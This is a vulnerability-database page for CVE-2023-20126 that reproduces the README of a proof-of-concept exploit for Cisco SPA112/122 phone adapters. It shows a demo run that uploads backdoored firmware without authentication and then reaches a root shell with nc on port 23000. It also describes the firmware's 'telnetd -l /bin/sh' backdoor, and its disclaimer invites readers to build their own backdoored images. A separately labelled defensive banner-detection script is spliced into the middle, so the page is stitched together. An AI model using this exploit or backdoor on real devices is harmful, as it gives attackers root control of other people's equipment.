PoC details: 6cad69cce0ea6f379d2b0e93b0aef56e3cb7115e

Source
Related vulnerability
Title: Cisco SPA112 2-Port Phone Adapter access control error vulnerability (CVE-2023-20126)
Description: Cisco SPA112 2-Port Phone Adapter is a telephone adapter made by Cisco (USA). Cisco SPA112 2-Port Phone Adapters contain a security vulnerability caused by a missing authentication step in the firmware upgrade feature, which may allow an attacker to execute arbitrary code with full privileges on an affected device.
Description
PoC for CVE-2023-20126
Introduction
# RancidCrisco
Minimum Viable PoC for CVE-2023-20126

This is the initial release. It works, but it's the 'simplest case' exploit.

Tested and working on SPA112/SPA122; the SPA232D requires a different firmware image.

Gives a root-shell on port 23000/tcp.

I still need to clean up the toolchain used for editing the firmware and will probably put that in a different repo. It is mostly based on the work of @BigNerd95, but with minor alterations to work on the SPA112/122 firmware files.

## Demo.

```
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin 
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.

< wait a few mins, nervously > 

$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????


BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0
```

## Files

- fwupload.py - firmware image uploader that bypasses authentication by simply not sending any, exploiting CVE-2023-20126. Takes two arguments: the URL of the device's web UI and the firmware file to upload.
- telnet-23000.bin - proof-of-concept malicious firmware image that spawns `telnetd -l /bin/sh -p 23000`, giving a root shell on port 23000/tcp. Based on work by bignerd95.
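A defender's counterpart to the backdoor above: a probe that connects to the port the PoC firmware listens on and decides whether what answers looks like the unauthenticated BusyBox shell shown in the demo. This is an added example, not code from the RancidCrisco repo. The port number and the banner text come from this page; the telnet option-negotiation bytes in the sample (what `nc` renders as `????????`) are constructed for the test, not captured from a device. Because `telnetd` sends IAC negotiation before the shell banner, the raw bytes are stripped of those sequences before matching, otherwise substring checks can fail.

```python
import socket

# Telnet protocol bytes (RFC 854) used for option negotiation.
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240

BACKDOOR_PORT = 23000                       # port used by telnet-23000.bin (from this page)
BANNER_MARKERS = (b"BusyBox", b"built-in shell (ash)")  # strings from the demo banner

# Constructed sample: assumed IAC WILL/DO negotiation followed by the banner
# text reproduced from the demo on this page.
SAMPLE_BANNER = (
    bytes([IAC, WILL, 1, IAC, WILL, 3, IAC, DO, 24])
    + b"\r\n\r\nBusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)\r\n"
    + b"Enter 'help' for a list of built-in commands.\r\n\r\n# "
)


def strip_telnet_iac(data: bytes) -> bytes:
    """Remove telnet negotiation (IAC DO/DONT/WILL/WONT <opt>, IAC SB ... IAC SE)
    so the remaining bytes are only what the shell printed. An escaped data
    byte (IAC IAC) is kept as a single 0xFF."""
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b != IAC:
            out.append(b)
            i += 1
            continue
        if i + 1 >= n:              # dangling IAC at end of buffer
            break
        cmd = data[i + 1]
        if cmd == IAC:              # escaped 0xFF data byte
            out.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):
            i += 3                  # IAC <cmd> <option>
        elif cmd == SB:             # subnegotiation: skip to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = n if end < 0 else end + 2
        else:
            i += 2                  # other two-byte IAC commands (NOP, GA, ...)
    return bytes(out)


def classify_banner(raw: bytes) -> str:
    """'busybox-shell' if the de-IAC'd bytes contain the demo's shell banner."""
    text = strip_telnet_iac(raw)
    return "busybox-shell" if any(m in text for m in BANNER_MARKERS) else "other"


def probe(host: str, port: int = BACKDOOR_PORT, timeout: float = 3.0):
    """Connect, read whatever the service volunteers, and classify it.
    Returns (state, raw_bytes); state is 'closed', 'unreachable',
    'open-silent', 'open-busybox-shell' or 'open-other'."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            chunks, total = [], 0
            try:
                while total < 4096:         # a banner is small; don't read forever
                    chunk = s.recv(1024)
                    if not chunk:
                        break
                    chunks.append(chunk)
                    total += len(chunk)
            except socket.timeout:
                pass                        # service stopped talking; use what we have
    except ConnectionRefusedError:
        return "closed", b""
    except (socket.timeout, OSError):
        return "unreachable", b""
    banner = b"".join(chunks)
    if not banner:
        return "open-silent", banner
    return "open-" + classify_banner(banner), banner


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.152"  # demo address from this page
    state, banner = probe(target)
    print(f"{target}:{BACKDOOR_PORT} -> {state}")
    if banner:
        print(strip_telnet_iac(banner).decode("ascii", "replace"))
```

`open-busybox-shell` on an ATA that should only expose its web UI and SIP is a strong indicator that an unsigned image such as telnet-23000.bin has been flashed; `open-other` or `open-silent` still means something unexpected is listening on 23000/tcp and deserves a look.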

## Licence
WTFPL.

## Bugs
Use the issue tracker.

## Disclaimer
If this bricks your fucking device, I don't take any responsibility.   
That is YOUR problem.  
I mean, I hacked together that backdoored firmware in an evening.  
Also, why aren't you following the writeup and building your own backdoored firmware?  
File snapshot

[4.0K] /data/pocs/6cad69cce0ea6f379d2b0e93b0aef56e3cb7115e
├── [1.6K] fwupload.py
├── [1.9K] README.md
└── [ 10M] telnet-23000.bin

0 directories, 3 files